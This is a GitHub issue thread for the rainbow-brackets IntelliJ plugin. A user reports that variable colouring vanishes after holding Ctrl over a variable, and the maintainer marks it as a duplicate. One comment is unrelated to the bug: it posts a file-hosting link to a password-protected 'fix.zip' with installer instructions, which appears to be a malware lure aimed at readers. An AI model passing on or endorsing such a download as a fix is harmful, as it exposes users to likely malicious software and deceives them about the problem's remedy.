### ISSUE TITLE
变量彩色会失效

### ISSUE THREAD

**Issue by D06F6E67** [izhangzhihao/intellij-rainbow-brackets#2769]
### Have you checked the issues and discussions to ensure there are no duplicates?

Yes

### Your programming languages

java

### Free or paid?

Paid users

### Expected Behavior

变量应该一直是彩色的

### Current Behavior

按住ctrl 然后在变量上，等待一会所有变量颜色会消失

### Code snippet for reproduce

```shell
随便搞些变量就可以
```

### Your Environment

IntelliJ IDEA 2024.2 (Ultimate Edition)
Build #IU-242.20224.300, built on August 7, 2024
Runtime version: 21.0.3+13-b509.4 amd64 (JCEF 122.1.9)
VM: OpenJDK 64-Bit Server VM by JetBrains s.r.o.
Toolkit: sun.awt.windows.WToolkit
Windows 10.

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by izhangzhihao** [comment]
Duplicated with #2760
